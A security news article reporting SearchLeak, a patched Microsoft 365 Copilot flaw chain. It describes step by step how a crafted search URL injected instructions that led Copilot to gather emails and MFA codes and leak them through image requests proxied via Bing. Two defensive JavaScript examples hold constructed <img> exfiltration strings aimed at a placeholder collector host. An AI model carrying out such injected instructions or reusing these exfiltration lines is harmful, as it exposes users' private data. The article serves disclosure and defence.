PROBABLYPWNED
Vulnerabilities | June 23, 2026 | 4 min read

SearchLeak Let Attackers Steal M365 Emails and MFA Codes in One Click

CVE-2026-42824 chained prompt injection, a timing race, and CSP bypass to exfiltrate Outlook emails, OneDrive files, and MFA codes via Microsoft 365 Copilot. Now patched.

Marcus Chen

A vulnerability chain in Microsoft 365 Copilot Enterprise Search allowed attackers to steal emails, calendar data, OneDrive files, and even MFA codes with a single click. Varonis Threat Labs disclosed the flaw, dubbed SearchLeak, which Microsoft patched on the backend before public disclosure.

The vulnerability, tracked as CVE-2026-42824, received a CVSS score of 6.5 from Microsoft (7.5 from NVD) despite the company labeling it critical. The discrepancy reflects the attack's reliance on user interaction—a victim had to click an attacker-crafted link for exploitation. This adds to a series of AI security vulnerabilities affecting enterprise platforms as organizations rush to deploy AI capabilities.

Three-Flaw Chain

SearchLeak chained three distinct weaknesses to achieve data exfiltration:

Parameter-to-Prompt Injection: The q parameter in Copilot Enterprise Search URLs passes directly to the AI as an executable prompt rather than a simple search query. Attackers craft URLs where the search term is actually a malicious instruction telling Copilot to query sensitive data and encode it in an image request.

Timing-Based Sanitizer Bypass: Microsoft's security guardrails wrap AI outputs in <code> blocks to prevent HTML execution, but this processing happens post-generation. Browsers render streamed content immediately, so injected <img> tags fire before sanitization completes. The race condition window is narrow but reliably exploitable.

CSP Bypass via Bing SSRF: The Copilot page's Content Security Policy allowlists *.bing.com. Attackers leverage Bing's image analysis endpoint as an exfiltration proxy—the endpoint performs server-side fetches to attacker-controlled URLs, carrying stolen data encoded in the request parameters while satisfying CSP restrictions.

The combination turns a legitimate Microsoft URL into a data theft weapon. Victims see what appears to be a normal Copilot search page while their indexed enterprise data streams to attacker infrastructure.

What Could Be Stolen

The attack gained access to anything the signed-in user could reach via Microsoft Graph:

  • Outlook emails including one-time codes, MFA verification messages, and password-reset links
  • Calendar invites and meeting notes
  • SharePoint documents accessible to the user
  • OneDrive files indexed by Copilot

The MFA code exfiltration is particularly dangerous. Organizations using email-based second factors could have their 2FA bypassed completely—an attacker stealing both credentials and the verification code can complete account takeover in real time.

This risk parallels concerns about AI agents acting on sensitive data that we covered when AutoJack demonstrated how AI assistants could be manipulated through crafted inputs.

Enterprise AI Introduces New Attack Surfaces

SearchLeak exemplifies an emerging vulnerability class where AI interfaces create unexpected security holes. Traditional web applications don't execute user-supplied search terms as instructions, but AI systems inherently blur the line between data and commands.

Microsoft's Copilot integrates deeply with enterprise data through Graph API access. That integration creates value—users can ask natural language questions about their documents and communications—but it also means prompt injection attacks can leverage those same access paths maliciously.

The timing-based sanitization bypass is particularly instructive. Microsoft implemented security controls, but the async nature of streaming AI responses created a window where those controls don't apply. Defense-in-depth assumptions based on traditional request-response models don't hold when responses stream incrementally.
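The ordering problem described above can be reproduced without a browser. The following is an added example, not code from Microsoft, Varonis, or this article: it assumes "sanitizing" means HTML-escaping inside a `<code>` wrapper, uses a hypothetical `Sink` class as a stand-in for the page, and runs on a constructed chunk sequence with placeholder hosts.

```javascript
// Constructed model output, split so the tag straddles a chunk boundary.
const CHUNKS = [
  "Here are your results: <im",
  'g src="https://collector.example.invalid/p?d=PLACEHOLDER">',
  " done.",
];

// Stand-in for the page: records every state the browser would have rendered.
class Sink {
  constructor() { this.states = []; }
  set(html) { this.states.push(html); }
  get final() { return this.states[this.states.length - 1]; }
  // True if any rendered state held a live (unescaped) <img> tag.
  everLive() { return this.states.some((s) => /<img\b[^>]*>/i.test(s)); }
}

const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
// Per-character escaping, so a tag split across chunks is still neutralized.
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => ENTITIES[c]);

// Weak ordering: stream raw chunks to the page, sanitize once generation ends.
function renderThenSanitize(chunks) {
  const sink = new Sink();
  let buf = "";
  for (const chunk of chunks) {
    buf += chunk;
    sink.set(buf); // raw markup reaches the page here
  }
  sink.set("<code>" + escapeHtml(buf) + "</code>"); // earlier states already rendered
  return sink;
}

// Hardened ordering: escape each chunk before it reaches the page.
function sanitizeThenRender(chunks) {
  const sink = new Sink();
  let safe = "";
  for (const chunk of chunks) {
    safe += escapeHtml(chunk);
    sink.set("<code>" + safe + "</code>");
  }
  return sink;
}

const weak = renderThenSanitize(CHUNKS);
const hard = sanitizeThenRender(CHUNKS);
console.log("weak ever live:", weak.everLive(), "| hardened ever live:", hard.everLive());
console.log("final states identical:", weak.final === hard.final);
```

Both orderings end in the same final markup, so a check that inspects only the finished response cannot tell them apart; the difference exists only in the intermediate states.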

Current Status

Microsoft mitigated the vulnerability on the backend before Varonis published their research. Since Copilot Enterprise runs as a managed service, tenant administrators cannot apply patches manually—the fix deployed automatically.

Organizations should monitor for suspicious Copilot activity patterns regardless. Logs showing unusual search queries, particularly those resembling encoded instructions rather than natural language questions, could indicate attempted exploitation or probing. The Klue Salesforce OAuth breach showed how attackers exploit similar cloud service misconfigurations to access enterprise data.
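One way to triage logged URLs for queries that look like instructions rather than search terms, as an added example that is not from the article or from Microsoft. The host, path, sample URLs, reason labels, and thresholds are all constructed assumptions; only the `q` parameter name comes from the article.

```javascript
// Constructed proxy-log URLs. Host and path are placeholders, not the real endpoint.
const BASE = "https://copilot.example.invalid/search";
const SAMPLE_URLS = [
  BASE + "?q=quarterly%20sales%20report",
  BASE + "?q=" + encodeURIComponent(
    "[constructed instruction text] <img src=https://collector.example.invalid/p?d=PLACEHOLDER>"),
  BASE + "?q=" + encodeURIComponent("word ".repeat(60).trim()),
  BASE + "?q=%253Cimg%2520src%253Dx%253E", // markup hidden behind double encoding
  BASE, // no q parameter at all
];

// Thresholds are assumptions; tune them against your tenant's normal queries.
const MAX_CHARS = 200;
const MAX_WORDS = 30;

// Undo nested percent-encoding so layered encoding cannot hide markup.
function fullyDecode(s, rounds = 3) {
  for (let i = 0; i < rounds; i++) {
    let next;
    try { next = decodeURIComponent(s); } catch { break; } // stray "%": keep as is
    if (next === s) break;
    s = next;
  }
  return s;
}

// Return the reasons a query looks like instructions rather than a search term.
function scoreQuery(q) {
  const reasons = [];
  if (/<\s*\/?\s*[a-z]/i.test(q)) reasons.push("html-markup");
  if (/\b[a-z][a-z0-9+.-]*:\/\//i.test(q)) reasons.push("embedded-url");
  if (q.length > MAX_CHARS) reasons.push("long-query");
  if (q.split(/\s+/).filter(Boolean).length > MAX_WORDS) reasons.push("many-words");
  return reasons;
}

// Parse each logged URL, extract q, and keep only the entries worth an analyst's look.
function triage(urls) {
  const hits = [];
  for (const raw of urls) {
    let url;
    try { url = new URL(raw); } catch { continue; } // not a URL: out of scope here
    const q = url.searchParams.get("q"); // searchParams decodes one layer
    if (q === null) continue;
    const reasons = scoreQuery(fullyDecode(q));
    if (reasons.length > 0) hits.push({ url: raw, reasons });
  }
  return hits;
}

console.log(triage(SAMPLE_URLS));
```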

Broader Implications

SearchLeak joins a growing list of AI-specific vulnerabilities demonstrating that enterprise AI assistants require security models distinct from traditional web applications. The research community has documented prompt injection, jailbreaks, and data exfiltration across every major AI platform.

Microsoft's rapid response—patching before public disclosure—suggests the company takes these issues seriously. But the vulnerability's existence in a production Enterprise feature highlights how quickly AI capabilities deploy relative to security hardening.

Organizations adopting AI assistants should assume similar vulnerabilities exist and implement compensating controls: restrict AI access to sensitive data categories, monitor for anomalous AI-generated requests, and educate users that AI interfaces can be weaponized through social engineering just like any other corporate application.
